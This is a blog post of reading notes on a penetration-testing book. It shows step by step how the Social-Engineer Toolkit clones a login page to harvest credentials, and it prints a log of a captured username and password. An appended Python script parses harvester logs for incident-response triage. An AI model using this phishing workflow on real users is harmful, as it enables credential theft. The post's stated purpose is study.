好记性不如铅笔头

Categories: Security, Operating systems

Reading notes on a certain 《魔鬼训练营》 book: cloning a website with setoolkit

!!! These notes are for study and exchange only; do not use them for any other purpose !!!

setoolkit (the Social-Engineer Toolkit) is a very useful social-engineering toolkit that bundles many tools; here the author only notes down its simplest usage.


Basic workflow for cloning a website with setoolkit:

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
........
set> 1 # choose 1

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
........

set> 2 # choose 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
........

set:webattack>3 # choose 3

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2 # choose 2: here we clone a site; an existing template or a manual import could be chosen instead
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.test.com/login.php # enter the URL to clone

[*] Cloning the website: http://www.test.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y # the author set APACHE to ON in set_config and kept the Apache directory as /var/www
[....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
. ok 
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue} # press Enter to start
.....

Once a user visits the cloned site and submits data, we can see the log on the back end:

root@kali:/var/www# pwd
/var/www
root@kali:/var/www# ls
harvester_2014-06-01 18:12:39.762872.txt  index.html  post.php
root@kali:/var/www# cat harvester_2014-06-01\ 18\:12\:39.762872.txt 
Array
(
    [log] => test
    [pwd] => 1234
    [wp-submit] => 登录
    [redirect_to] => http://www.test.com/login.php
    [testcookie] => 1
)
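As an added example (not from the book, the blog, or SET itself), a small incident-response triage script that parses a harvester_<date>.txt report in the print_r layout shown above, lists which accounts were submitted, and names the secret fields without copying their values; the sample report and the account/secret field-name lists are constructed assumptions.

```python
import re

# Constructed sample in the print_r layout that SET's post.php writes to
# harvester_<date>.txt (mirrors the listing above; not a real capture).
SAMPLE_REPORT = """Array
(
    [log] => test
    [pwd] => 1234
    [wp-submit] => 登录
    [redirect_to] => http://www.test.com/login.php
    [testcookie] => 1
)
"""

# One "[key] => value" line of a print_r dump; the value may be empty.
ENTRY_RE = re.compile(r"^\s*\[(?P<key>[^\]]+)\] =>\s?(?P<value>.*)$")

# Assumed field names; adjust to the cloned site's form. Tuples keep priority order.
ACCOUNT_FIELDS = ("log", "user", "username", "email")
SECRET_FIELDS = ("pwd", "password", "passwd", "pass")


def parse_harvester_report(text):
    """Parse one or more print_r 'Array ( ... )' dumps into a list of dicts (one per POST)."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "Array":
            current = {}                      # a new captured POST begins
        elif stripped == ")" and current is not None:
            records.append(current)           # dump closed, keep it
            current = None
        elif current is not None:
            m = ENTRY_RE.match(line)
            if m:                             # "(" and blank lines do not match
                current[m.group("key")] = m.group("value")
    return records


def triage(records):
    """Summarise who submitted what, naming secret fields but never copying their values."""
    summary = []
    for rec in records:
        account = next((rec[k] for k in ACCOUNT_FIELDS if k in rec), None)
        secrets = [k for k in SECRET_FIELDS if rec.get(k)]   # names only, values dropped
        summary.append({"account": account, "secret_fields_submitted": secrets,
                        "redirect_to": rec.get("redirect_to")})
    return summary
```

Run it over every harvester_*.txt found in the web root to get the list of accounts that need a password reset and notification.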

Notes:

The author does not come from a web-development background and is not very familiar with web development. After a quick look at the two files index.html and post.php, it feels like cloning a site this way is still quite limited: the form has to be submitted via POST for it to work. I'm not sure whether that is right; if any expert passes by, please offer a pointer or two.
